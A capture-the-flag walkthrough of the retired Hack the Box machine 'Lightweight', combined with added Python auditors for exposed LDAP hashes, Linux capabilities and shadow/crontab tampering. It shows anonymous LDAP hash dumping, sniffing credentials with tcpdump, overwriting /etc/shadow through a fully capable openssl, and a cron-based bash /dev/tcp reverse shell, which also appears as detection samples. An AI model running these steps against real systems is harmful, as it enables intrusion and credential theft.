Hack the Box – Lightweight Walkthrough

Today we're going to solve another CTF machine, "Lightweight". It is now a retired box and is accessible to VIP members.
Specifications
- Target OS: Linux
- IP Address: 10.10.10.119
- Difficulty: Medium
Weakness
- Abusing Linux Capabilities
Contents
- Getting user
- Getting root
Reconnaissance
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step we identify what services are running behind the IP address.

```
nmap -sC -sV -Pn 10.10.10.119

22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 19:97:59:9a:15:fd:d2:ac:bd:84:73:c4:29:e9:2b:73 (RSA)
|   256 88:58:a1:cf:38:cd:2e:15:1d:2c:7f:72:06:a3:57:67 (ECDSA)
|_  256 31:6c:c1:eb:3b:28:0f:ad:d5:79:72:8f:f5:b5:49:db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51
|_ssl-date: TLS randomness does not represent time
```

We have three open ports: SSH (22), HTTP (80) and LDAP (389). Let's take a look at LDAP first.
LDAP Enumeration
Let's enumerate LDAP with the ldapsearch tool. `-x` selects simple authentication and no bind DN is given, so this is an anonymous bind.

```
ldapsearch -h 10.10.10.119 -p 389 -x -b dc=lightweight,dc=htb

# extended LDIF
#
# LDAPv3
# base <dc=lightweight,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# lightweight.htb
dn: dc=lightweight,dc=htb
objectClass: top
objectClass: dcObject
objectClass: organization
o: lightweight htb
dc: lightweight

# Manager, lightweight.htb
dn: cn=Manager,dc=lightweight,dc=htb
objectClass: organizationalRole
cn: Manager
description: Directory Manager

# People, lightweight.htb
dn: ou=People,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: People

# Group, lightweight.htb
dn: ou=Group,dc=lightweight,dc=htb
objectClass: organizationalUnit
ou: Group

# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
cn: ldapuser1
sn: ldapuser1
mail: ldapuser1@lightweight.htb
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2R
 oai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1000
gidNumber: 1000
homeDirectory: /home/ldapuser1

# ldapuser2, People, lightweight.htb
dn: uid=ldapuser2,ou=People,dc=lightweight,dc=htb
uid: ldapuser2
cn: ldapuser2
sn: ldapuser2
mail: ldapuser2@lightweight.htb
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
objectClass: shadowAccount
userPassword:: e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdms
 zYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x
shadowLastChange: 17691
shadowMin: 0
shadowMax: 99999
shadowWarning: 7
loginShell: /bin/bash
uidNumber: 1001
gidNumber: 1001
homeDirectory: /home/ldapuser2

# ldapuser1, Group, lightweight.htb
dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser1
userPassword:: e2NyeXB0fXg=
gidNumber: 1000

# ldapuser2, Group, lightweight.htb
dn: cn=ldapuser2,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
objectClass: top
cn: ldapuser2
userPassword:: e2NyeXB0fXg=
gidNumber: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8
```
We found some interesting information: the userPassword values of both users (base64-encoded, which ldapsearch marks with a double colon).

- Username: ldapuser1, userPassword (base64): e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2Roai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
- Username: ldapuser2, userPassword (base64): e2NyeXB0fSQ2JHhKeFBqVDBNJDFtOGtNMDBDSllDQWd6VDRxejhUUXd5R0ZRdmszYm9heW11QW1NWkNPZm0zT0E3T0t1bkxaWmxxeXRVcDJkdW41MDlPQkUyeHdYL1FFZmpkUlF6Z24x

After decoding the Base64 we get these hashes:

```
{crypt}$6$3qx0SD9x$Q9y1lyQaFKpxqkGqKAjLOWd33Nwdhj.l4MzV7vTnfkE/g/Z/7N5ZbdEQWfup2lSdASImHtQFh6zMo41ZA./44/
{crypt}$6$xJxPjT0M$1m8kM00CJYCAgzT4qz8TQwyGFQvk3boaymuAmMZCOfm3OA7OKunLZZlqytUp2dun509OBE2xwX/QEfjdRQzgn1
```

The hashing algorithm is SHA-512 crypt (`$6$`); I tried cracking it but it didn't work.
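What made this possible is a directory ACL that lets an anonymous bind read userPassword. The following Python script is an added example, not part of the original walkthrough: it turns an ldapsearch LDIF dump into an audit finding by unfolding continuation lines, decoding the `::` base64 values, and reporting every entry whose password hash came back together with the crypt scheme in use. The LDIF sample is constructed here and reproduces the shape of the output above; the scheme names and the ACL named in the comments are standard OpenLDAP and crypt(3) conventions, not something taken from the box.

```python
import base64
import re

# Constructed LDIF sample modelled on the ldapsearch output above: one user entry whose
# userPassword is folded over a continuation line (LDIF wraps long values this way) and
# one group entry whose password is the placeholder "x".
SAMPLE_LDIF = """\
# ldapuser1, People, lightweight.htb
dn: uid=ldapuser1,ou=People,dc=lightweight,dc=htb
uid: ldapuser1
objectClass: posixAccount
userPassword:: e2NyeXB0fSQ2JDNxeDBTRDl4JFE5eTFseVFhRktweHFrR3FLQWpMT1dkMzNOd2R
 oai5sNE16Vjd2VG5ma0UvZy9aLzdONVpiZEVRV2Z1cDJsU2RBU0ltSHRRRmg2ek1vNDFaQS4vNDQv
loginShell: /bin/bash

# ldapuser1, Group, lightweight.htb
dn: cn=ldapuser1,ou=Group,dc=lightweight,dc=htb
objectClass: posixGroup
userPassword:: e2NyeXB0fXg=
gidNumber: 1000

# search result
search: 2
result: 0 Success
"""

# crypt(3) hash identifiers; "$2" covers the bcrypt variants $2a$, $2b$ and $2y$.
CRYPT_SCHEMES = (("$1$", "md5crypt"), ("$2", "bcrypt"), ("$5$", "sha256crypt"),
                 ("$6$", "sha512crypt"), ("$y$", "yescrypt"))


def parse_ldif(text):
    """Parse LDIF text into a list of {attribute: [values]} dicts.

    Two LDIF rules matter for ldapsearch output: a line starting with one space
    continues the previous line (RFC 2849 folding), and 'attr:: value' means the
    value is base64-encoded, which is how userPassword is printed.
    """
    unfolded = re.sub(r"\r?\n ", "", text)
    entries, current = [], {}
    for line in unfolded.splitlines():
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#"):
            continue
        m = re.match(r"^([A-Za-z][\w;.-]*)(::?) ?(.*)$", line)
        if not m:
            continue
        attr, sep, value = m.groups()
        if sep == "::":
            value = base64.b64decode(value).decode("utf-8", "replace")
        current.setdefault(attr, []).append(value)
    if current:
        entries.append(current)
    return entries


def classify_password(value):
    """Return (scheme, note) for a userPassword value such as '{crypt}$6$salt$hash'."""
    m = re.match(r"^\{([A-Za-z0-9]+)\}(.*)$", value, re.S)
    if not m:
        return "cleartext", "stored without a scheme prefix"
    scheme, rest = m.group(1).lower(), m.group(2)
    if scheme != "crypt":
        return scheme, "LDAP password scheme"
    if rest in ("x", "*") or rest.startswith("!"):
        return "crypt", "locked: no usable password"
    for prefix, name in CRYPT_SCHEMES:
        if rest.startswith(prefix):
            return name, "crypt(3) hash: crackable offline once exposed"
    return "descrypt", "traditional DES crypt: weak"


def audit_exposed_passwords(ldif_text):
    """List (dn, scheme, note) for every entry whose userPassword was returned.

    Any finding means the ACL allowed this bind to read password hashes.  The
    OpenLDAP convention is an olcAccess rule on attrs=userPassword of
    'by self write by anonymous auth by * none', which lets clients bind with
    the password but never read it.
    """
    findings = []
    for entry in parse_ldif(ldif_text):
        for value in entry.get("userPassword", []):
            scheme, note = classify_password(value)
            findings.append((entry["dn"][0], scheme, note))
    return findings


if __name__ == "__main__":
    for dn, scheme, note in audit_exposed_passwords(SAMPLE_LDIF):
        print(f"{dn}: {scheme} ({note})")
```

Run it against the real output by piping `ldapsearch -x ...` into a file and passing that text to `audit_exposed_passwords`; an empty result under an anonymous bind is the state you want.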
Enumeration
Let's do some enumeration and browse to http://10.10.10.119.

In a typical CTF methodology we would enumerate hidden directories and files next, but here some kind of firewall blocks that, so we have to enumerate manually.

The user.php page tells us that an SSH account has been created for us:

"This server lets you get in with ssh. Your IP (10.10.14.17) is automatically added as userid and password within a minute of your first HTTP page request. We strongly suggest you to change your password as soon as you get in the box."

Let's log in over SSH.

There is nothing in the current directory, so let's find out what other users exist with `cat /etc/passwd`.

Let's enumerate further with the LinEnum.sh script.
After running the script we can see files with POSIX capabilities set.

Linux capabilities are used to grant a binary the specific privileges it needs for its task, without giving the user root or making the binary SUID.

The tcpdump binary has the cap_net_admin and cap_net_raw capabilities enabled:

```
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
```

From capabilities(7), **CAP_NET_RAW**:
- use RAW and PACKET sockets;
- bind to any address for transparent proxying.
Let's run tcpdump on the loopback interface, capture the LDAP traffic (port 389) and save it to a file.

```
tcpdump -i lo port 389 -w capture.cap -v
```

Let's transfer capture.cap to our local machine.

```
scp 10.10.14.17@10.10.10.119:/home/10.10.14.17/capture.cap capture.cap
```

Opening the capture, the LDAP simple bind (sent in clear text on port 389) contains the following credentials:

- Username: ldapuser2
- Password: 8bc8251332abe1d7f105d3e53ad39ac2
Now let's go back to our SSH session and switch user with these credentials.

```
[10.10.14.17@lightweight ~]$ su ldapuser2
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.17]$
```
We owned user.txt
Privilege Escalation
Let's head towards getting the root.txt flag. There's a file backup.7z; it's password protected, so let's transfer it to our local machine and try cracking it.

Let's encode backup.7z into Base64 on the box and decode it on our local machine.

I used this tool to run a dictionary attack against backup.7z:

```
python main.py --files backup.7z --wordlist rockyou.txt
```
After extracting the 7z file we got some php files.
After extracting the 7z file we get some PHP files. Running `cat status.php | head -30` reveals hard-coded credentials:

```
ldapuser1 f3ca9d298a553da117442deeb6fa932d
```

We have the ldapuser1 credentials, so let's `su - ldapuser1`.

```
[ldapuser2@lightweight ~]$ su - ldapuser1
Password: f3ca9d298a553da117442deeb6fa932d
```

Let's look at the files inside /home/ldapuser1/.

There are some PHP files which don't contain anything interesting. Let's check the capabilities of the openssl and tcpdump binaries found there.

```
[ldapuser1@lightweight ~]$ getcap -r .
./tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep
```

This openssl copy has the full capability set (`=ep`: every capability effective and permitted), so it can read files that only root can read, such as root.txt:

```
./openssl enc -base64 -in /root/root.txt -out ./root.txt.b64
```
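The capability strings above (`= cap_net_admin,cap_net_raw+ep` on tcpdump and `=ep` on openssl) follow the cap_to_text(3) grammar, and the difference between them is the whole story of this box. The script below is an added example, not code from the walkthrough: it parses getcap output into a per-capability flag set and rates each file, so an administrator running `getcap -r /` can spot a binary that has been handed every capability. The getcap lines are constructed (the tcpdump and openssl ones mirror the page; the ping line is an added benign case), and the `RISKY` table is my own summary of capabilities(7).

```python
import re

# Constructed getcap output.  The tcpdump and openssl lines mirror the two found on
# this box; the ping line is an added, benign example of capabilities that are
# permitted (p) but not effective (e).  Older libcap prints "path = caps", where the
# '=' already belongs to the cap_to_text() string ("= cap_net_raw+ep" means "clear
# everything, then raise cap_net_raw in e and p").
SAMPLE_GETCAP = """\
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep
/usr/bin/ping = cap_net_admin,cap_net_raw+p
"""

ALL = "*"  # key used when a clause names no capability, i.e. applies to all of them

# Capabilities worth a second look, summarised from capabilities(7).
RISKY = {
    "cap_net_raw": "raw/packet sockets: can sniff any traffic on the host, including "
                   "clear-text credentials on loopback",
    "cap_net_admin": "network configuration: interfaces, routes, firewall rules",
    "cap_dac_override": "bypasses file read, write and execute permission checks",
    "cap_dac_read_search": "bypasses file read and directory search permission checks",
    "cap_setuid": "can change UID, including to 0",
    "cap_sys_admin": "catch-all administrative capability, close to full root",
    "cap_sys_ptrace": "can attach to and inspect other processes",
}


def parse_cap_text(cap_text):
    """Interpret a cap_to_text(3) string such as '= cap_net_raw+ep' or '=ep'.

    Grammar: whitespace-separated clauses; each is a comma-separated capability list
    followed by one or more operator/flag groups ([=+-] then any of e, i, p).  An
    empty list before '=' means every capability.  Returns {capability: set(flags)},
    with the key '*' standing for "all capabilities".
    """
    state = {}
    for clause in cap_text.split():
        m = re.fullmatch(r"([a-z0-9_,]*)((?:[=+-][eip]*)+)", clause)
        if not m:
            raise ValueError(f"unrecognised capability clause: {clause!r}")
        names = [n for n in m.group(1).split(",") if n] or [ALL]
        for op, flags in re.findall(r"([=+-])([eip]*)", m.group(2)):
            if op == "=":
                if names == [ALL]:
                    state.clear()  # a bare '=' resets every capability first
                for cap in names:
                    state[cap] = set(flags)
            elif op == "+":
                for cap in names:
                    state.setdefault(cap, set()).update(flags)
            else:  # '-'
                for cap in (list(state) if names == [ALL] else names):
                    state.get(cap, set()).difference_update(flags)
    return {cap: flags for cap, flags in state.items() if flags}


def audit_getcap(output):
    """Turn getcap output into (path, severity, reason) findings."""
    findings = []
    for line in output.splitlines():
        if not line.strip():
            continue
        path, cap_text = line.split(None, 1)
        caps = parse_cap_text(cap_text)
        if ALL in caps:
            flags = "".join(sorted(caps[ALL]))
            findings.append((path, "critical",
                             f"every capability ({flags}): root-equivalent file access and more"))
            continue
        for cap, flags in caps.items():
            if cap in RISKY:
                # Effective means the privilege is live as soon as the binary runs;
                # permitted-only means the program has to raise it itself.
                severity = "high" if "e" in flags else "medium"
                findings.append((path, severity, f"{cap}+{''.join(sorted(flags))}: {RISKY[cap]}"))
    return findings


if __name__ == "__main__":
    for path, severity, reason in audit_getcap(SAMPLE_GETCAP):
        print(f"[{severity}] {path}: {reason}")
```

The parser deliberately handles the clear-then-raise form (`= caps+ep`) separately from the all-capabilities form (`=ep`), because the two look alike at a glance and getcap prints both.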
Getting Root By Abusing Linux Capabilities
Let's modify the /etc/shadow file to change the root password using the openssl capability. First copy it out:

```
[ldapuser1@lightweight ~]$ ./openssl enc -base64 -in /etc/shadow -out ./shadow.b64
[ldapuser1@lightweight ~]$ base64 -d shadow.b64 > shadow
```

We need to create a salted password hash using openssl; let's use root as both salt and password.

```
[ldapuser1@lightweight ~]$ openssl passwd -1 -salt root root
$1$root$9gr5KxwuEdiI80GtIzd.U0
```

Replace the salted password hash in the copied shadow file; `cat shadow | head -1` shows the root entry.

We can then use the openssl capability to overwrite the original /etc/shadow with our modified copy.

```
./openssl enc -in shadow -out /etc/shadow
```
And we got root!
We can also add a cron job and spawn a reverse shell as root.

```
[ldapuser1@lightweight ~]$ cp /etc/crontab .
[ldapuser1@lightweight ~]$ echo '* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.17/1337 0>&1' >> crontab
[ldapuser1@lightweight ~]$ base64 crontab > crontab.b64
[ldapuser1@lightweight ~]$ ./openssl enc -d -base64 -in crontab.b64 -out /etc/crontab
```

Now start a listener, wait a minute, and you'll get a shell.
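Both of the root-level writes above leave traces a defender can check for. The script below is an added example, not part of the original walkthrough: it compares a baseline copy of /etc/shadow against the current file (flagging a hash that changed without the last-change day moving, and hashes in a scheme other than the system's configured one) and scans /etc/crontab for the redirection pattern used above. All file contents are constructed; the `$6$` hashes are placeholders and the `$1$root$...` value is the one generated on this page.

```python
import re

# Constructed baseline copy of /etc/shadow (the copy made above) and a constructed
# "current" file in which root's hash was replaced.  The $6$ values are placeholders,
# not real hashes; the $1$root$... value is the md5crypt hash generated on this page.
SHADOW_BASELINE = """\
root:$6$PLACEHOLDERSALT$PLACEHOLDERHASH:17691:0:99999:7:::
bin:*:17110:0:99999:7:::
ldapuser1:$6$OTHERSALT$OTHERHASH:17691:0:99999:7:::
"""
SHADOW_CURRENT = """\
root:$1$root$9gr5KxwuEdiI80GtIzd.U0:17691:0:99999:7:::
bin:*:17110:0:99999:7:::
ldapuser1:$6$OTHERSALT$OTHERHASH:17691:0:99999:7:::
"""
# Constructed /etc/crontab: a normal CentOS-style header plus the line appended above.
CRONTAB_CURRENT = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# run-parts
01 * * * * root run-parts /etc/cron.hourly
* * * * * root /bin/bash -i >& /dev/tcp/10.10.14.17/1337 0>&1
"""

CRYPT_SCHEMES = (("$1$", "md5crypt"), ("$2", "bcrypt"), ("$5$", "sha256crypt"),
                 ("$6$", "sha512crypt"), ("$y$", "yescrypt"))

# Indicators taken from the cron line above: a bash network redirection and an
# interactive shell with its standard streams tied to it.
SUSPICIOUS_CRON = (
    (r"/dev/tcp/", "bash /dev/tcp redirection to a remote host"),
    (r"\bbash\s+-i\b", "interactive shell launched from cron"),
    (r">&\s*/dev/|0>&1", "standard streams redirected to a socket"),
)


def parse_shadow(text):
    """Map user -> (hash, last_change_day) from shadow-format lines."""
    users = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[0]:
            users[fields[0]] = (fields[1], fields[2])
    return users


def hash_scheme(h):
    """Name the crypt(3) scheme of a shadow hash field."""
    if h == "":
        return "empty"
    if h in ("*", "x") or h.startswith("!"):
        return "locked"
    for prefix, name in CRYPT_SCHEMES:
        if h.startswith(prefix):
            return name
    return "descrypt"


def audit_shadow(baseline_text, current_text, expected_scheme="sha512crypt"):
    """Compare the current shadow file with a baseline and return (user, reason) findings.

    expected_scheme should match ENCRYPT_METHOD in /etc/login.defs (SHA512 on CentOS 7).
    passwd and chpasswd update field 3 (days since the epoch) when they change a hash,
    so a hash that changed while that day stayed put points at a direct file write.
    """
    base, cur = parse_shadow(baseline_text), parse_shadow(current_text)
    findings = []
    for user, (h, lastchg) in cur.items():
        scheme = hash_scheme(h)
        if scheme == "empty":
            findings.append((user, "empty password field: login without a password"))
        elif scheme not in ("locked", expected_scheme):
            findings.append((user, f"hash uses {scheme}, expected {expected_scheme}"))
        if user in base and base[user][0] != h:
            reason = "hash changed since baseline"
            if base[user][1] == lastchg:
                reason += " but the last-change day did not"
            findings.append((user, reason))
    return findings


def audit_crontab(text):
    """Return (line_number, user, reasons) for system crontab entries with indicators."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#") or re.match(r"^\w+=", s):
            continue  # blank line, comment or environment assignment
        fields = s.split(None, 6)  # five time fields, the user, then the command
        if len(fields) < 7:
            continue
        reasons = [why for pattern, why in SUSPICIOUS_CRON if re.search(pattern, fields[6])]
        if reasons:
            findings.append((lineno, fields[5], reasons))
    return findings


if __name__ == "__main__":
    for user, reason in audit_shadow(SHADOW_BASELINE, SHADOW_CURRENT):
        print(f"shadow: {user}: {reason}")
    for lineno, user, reasons in audit_crontab(CRONTAB_CURRENT):
        print(f"crontab line {lineno} (runs as {user}): {'; '.join(reasons)}")
```

The baseline comparison is the part that matters: a file-integrity tool (AIDE, or a package-manager verify of /etc/crontab) gives the same signal on a real host, and the tamper here succeeded precisely because nothing was comparing those two files to a known-good copy.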